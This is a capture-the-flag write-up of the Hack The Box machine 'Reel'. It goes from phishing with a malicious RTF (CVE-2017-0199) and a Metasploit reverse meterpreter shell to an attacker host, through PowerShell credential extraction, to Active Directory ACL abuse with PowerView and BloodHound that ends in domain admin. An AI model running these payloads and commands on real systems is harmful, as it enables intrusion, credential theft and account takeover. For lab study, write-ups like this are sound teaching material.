Writeup: Hack The Box - Machines - Reel

Description

  • Name: Reel
  • IP: 10.10.10.77
  • Author: egre55
  • Difficulty: 5.4/10

Discovery

nmap -sV -sC -Pn -p 1-65535 -T5 10.10.10.77

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-29-18 12:19AM <DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
|_ sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY

Pwn

First we downloaded all the files from the FTP:

The readme states:

1
2
3
please email me any rtf format procedures - I'll review and convert.

new format / converted documents will be saved here.

So we need to send a malicious RTF document to the machine using the SMTP service on port 25.

We first need an email address to send these emails and from the FTP’s files we discovered some email addresses.

1
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:creator>nico@megabank.com</dc:creator><cp:revision>4</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2017-10-31T18:42:00Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-31T18:51:00Z</dcterms:modified></cp:coreProperties>

We found an email address: nico@megabank.com but also LAPTO12.HTB.LOCAL and WEF.HTB.LOCAL in the docx file.

From metasploit we found an exploit called exploit/windows/fileformat/office_word_hta created for the CVE-2017-0199 to craft a malicious RTF file with a meterpreter payload.

And with alpine we sent an email to reel@htb.local (or any other address in htb.local domain).

N.B. on alpine we need to set as our domain: htb.local and as SMTP server the IP 10.10.10.77.

And we got a session!!

Once inside we first searched for the user flag and some infos about the user.

In the same folder we found another file called cred.xml which contains a PSCredential object

1
2
3
4
5
6
7
8
9
10
11
12
13
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">HTB\Tom</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS>
</Props>
</Obj>
</Objs>

This object could be manipulated only on the same computer of the owner of the file (HTB\nico).
From a powershell shell from meterpreter we can get the password for HTB\Tom with this command: $credential = Import-CliXml -Path 'C:\Users\nico\Desktop\cred.xml';$credential.GetNetworkCredential().Password.

First we load the file a Credential as SecureStringand then we can access those encrypted information.

The password for the user tom is: 1ts-mag1c!!!.

Now we can SSH into the machine with this combination.

Tom groups informations (net user tom)

1
2
3
4
Local Group Memberships      *Print Operators
Global Group memberships *Domain Users *SharePoint_Admins
*MegaBank_Users *DR_Site
*HelpDesk_Admins *Restrictions

Using reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" we found the password for the user nico: 4dri@na2017!**. Yes, this is useless for our privesc proces :)

In C:\Users\tom\Desktop\AD Audit we have BloodHound folder and note.txt:

1
2
3
Findings:
Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).
Maybe we should re-run Cypher query against other groups we've created.

BloodHound is a tool to reveal hidden and unintended relationships within an Active Directory environment; the tool require a recon phase to read all informations from the AD: this data collection is possible with PowerView (from PowerSploit).

Luckly in the BloodHound folder there is the BloodHound_Old.ps1 script and to use it we simply Import-Module ./BloodHound_Old.ps1 and with Invoke-BloodHound we can create the CSV files with all informations.

To download our files we create a meterpreter session: msfconsole -x "use exploit/multi/script/web_delivery; set target PSH; set payload windows/x64/meterpreter/reverse_tcp; set srvhost 10.10.14.169; set LHOST 10.10.14.169; set LPORT 3487; run".

Now have all the data for BloodHound (you need to install it on you machine with neo4j).

From the BloodHound application we can query the DB create with out CSVs to find the shortest path to Domain Admins.

From the note, unfortunately, we know that we can’t exploit a shortest path to Domain Admins so we need to run Cypher to query the shortest path for others groups.

With /usr/share/neo4j/bin/cypher-shel we have a command line query interface for the boltDB create within BloodHound (or from the Raw Query in BloodHound GUI).

With Get-ADGroup -filter * -properties GroupCategory | ft name,SamAccountName we got all groups in AD:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
name                                                            SamAccountName
---- --------------
WinRMRemoteWMIUsers__ WinRMRemoteWMIUsers__
Administrators Administrators
Users Users
Guests Guests
Print Operators Print Operators
Backup Operators Backup Operators
Replicator Replicator
Remote Desktop Users Remote Desktop Users
Network Configuration Operators Network Configuration Operators
Performance Monitor Users Performance Monitor Users
Performance Log Users Performance Log Users
Distributed COM Users Distributed COM Users
IIS_IUSRS IIS_IUSRS
Cryptographic Operators Cryptographic Operators
Event Log Readers Event Log Readers
Certificate Service DCOM Access Certificate Service DCOM Access
RDS Remote Access Servers RDS Remote Access Servers
RDS Endpoint Servers RDS Endpoint Servers
RDS Management Servers RDS Management Servers
Hyper-V Administrators Hyper-V Administrators
Access Control Assistance Operators Access Control Assistance Operators
Remote Management Users Remote Management Users
Domain Computers Domain Computers
Domain Controllers Domain Controllers
Schema Admins Schema Admins
Enterprise Admins Enterprise Admins
Cert Publishers Cert Publishers
Domain Admins Domain Admins
Domain Users Domain Users
Domain Guests Domain Guests
Group Policy Creator Owners Group Policy Creator Owners
RAS and IAS Servers RAS and IAS Servers
Server Operators Server Operators
Account Operators Account Operators
Pre-Windows 2000 Compatible Access Pre-Windows 2000 Compatible Access
Incoming Forest Trust Builders Incoming Forest Trust Builders
Windows Authorization Access Group Windows Authorization Access Group
Terminal Server License Servers Terminal Server License Servers
Allowed RODC Password Replication Group Allowed RODC Password Replication Group
Denied RODC Password Replication Group Denied RODC Password Replication Group
Read-only Domain Controllers Read-only Domain Controllers
Enterprise Read-only Domain Controllers Enterprise Read-only Domain Controllers
Cloneable Domain Controllers Cloneable Domain Controllers
Protected Users Protected Users
DnsAdmins DnsAdmins
DnsUpdateProxy DnsUpdateProxy
Exchange Install Domain Servers $831000-BCI3MP5FNBO5
Backup_Admins Backup_Admins
AppLocker_Test AppLocker_Test
SharePoint_Admins SharePoint_Admins
DR_Site DR_Site
SQL_Admins SQL_Admins
HelpDesk_Admins HelpDesk_Admins
Restrictions Restrictions
All_Staff All_Staff
MegaBank_Users MegaBank_Users
Finance_Users Finance_Users
HR_Team HR_Team

The syntax for Cypher is not easy but is well documented and full of examples: https://blog.cptjesus.com/posts/introtocypher.

The query for searching the group nodes that can be returned to only the DOMAIN ADMINS@HTB.LOCAL from the n nodes finding the shortest path is: MATCH (n:User), (m:Group {name: "DOMAIN ADMINS@INTERNAL.LOCAL"}), p=shortestPath((n)-[*1..]->(m)) RETURN p.

First we need to search all groups that have admin right: MATCH (n:Group) WHERE n.name =~ "(?i).*ADMINS.*" WITH n MATCH (n)<-[r:MemberOf*1..]-(m) RETURN n,r,m; with this query we got all admins group and their relationships

Using this command Import-Module ActiveDirectory;cd ad:;(Get-Acl(Get-ADGroup -Filter 'name -eq "backup_admins"').DistinguishedName).access | ft identityreference, accessControlType -AutoSize we can read which rights a group has over the system.

Since tom is member of SharePoint_Admins and HelpDesk_Admins we can skip this two groups; backup_admins is our target group since a backup routine/user should access all data (including our root.txt inside the Administrator folder). From tom we can’t add any user to backup_admins so we need to exploit another user.

We found out that we can use claire to access backup_admins group: tom is a WriteOwner for claire.

In order to privesc to claire we check the rights from tom to claire within BloodHound (bruteforcing user all the users).

We found that tom can set the WriteOwner right over claire: we can reset the user password from tom.

1
2
3
4
5
6
cd "C:\Users\tom\Desktop\AD Audit\BloodHound"
$upwd = ConvertTo-SecureString "1ts-mag1c!!!" -AsPlainText -Force;
Import-Module ./PowerView.ps1
Set-DomainObjectOwner -identity claire -owneridentity tom
Add-ObjectACL -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword
Set-ADAccountPassword claire -NewPassword $upwd –Reset

This script will use PowerView to change the default password of claire to the same of tom.

Now we can SSH as claire.

But we cannot add claire to backup_admins with Add-ADGroupMember -Identity "backup_admins" -Members claire so from tom session we used

1
2
3
4
5
cd "C:\Users\tom\Desktop\AD Audit\BloodHound"
$upwd = ConvertTo-SecureString "1ts-mag1c!!!" -AsPlainText -Force;
Import-Module ./PowerView.ps1
$cred = New-Object System.Management.Automation.PSCredential('HTB.LOCAL\Claire', $upwd)
Add-DomainGroupMember -Identity "backup_admins" -Members 'Claire' -Credential $cred

to add claire to our backup_admins group. Now we can SSH as claire with read permission on the Administrator folder:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
PS C:\> net user claire
User name claire
Full Name Claire Danes
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 7/24/2018 7:59:49 PM
Password expires Never
Password changeable 7/25/2018 7:59:49 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 7/24/2018 6:42:19 PM

Logon hours allowed All

Local Group Memberships *Hyper-V Administrator
Global Group memberships *Backup_Admins *Domain Users
*MegaBank_Users *DR_Site
*Restrictions

But we cannot access the root.txt file:

On the admin desktop folder we found some script used to backup file over the system into a shared folder \\BACKUP03.

We cannot access that folder but we found at the head of the BackupScript.ps1:

1
2
# admin password
$password="Cr4ckMeIfYouC4n!"

Using this password to SSH with administrator we can read the root flag!

BloodHound resources

https://porterhau5.com/blog/representing-password-reuse-in-bloodhound/

https://porterhau5.com/blog/extending-bloodhound-track-and-visualize-your-compromise/

https://github.com/BloodHoundAD/Bloodhound/wiki

https://blog.cptjesus.com/posts/introtocypher

https://blog.stealthbits.com/attacking-active-directory-permissions-with-bloodhound/

https://wald0.com/?p=112

https://threat.tevora.com/lay-of-the-land-with-bloodhound/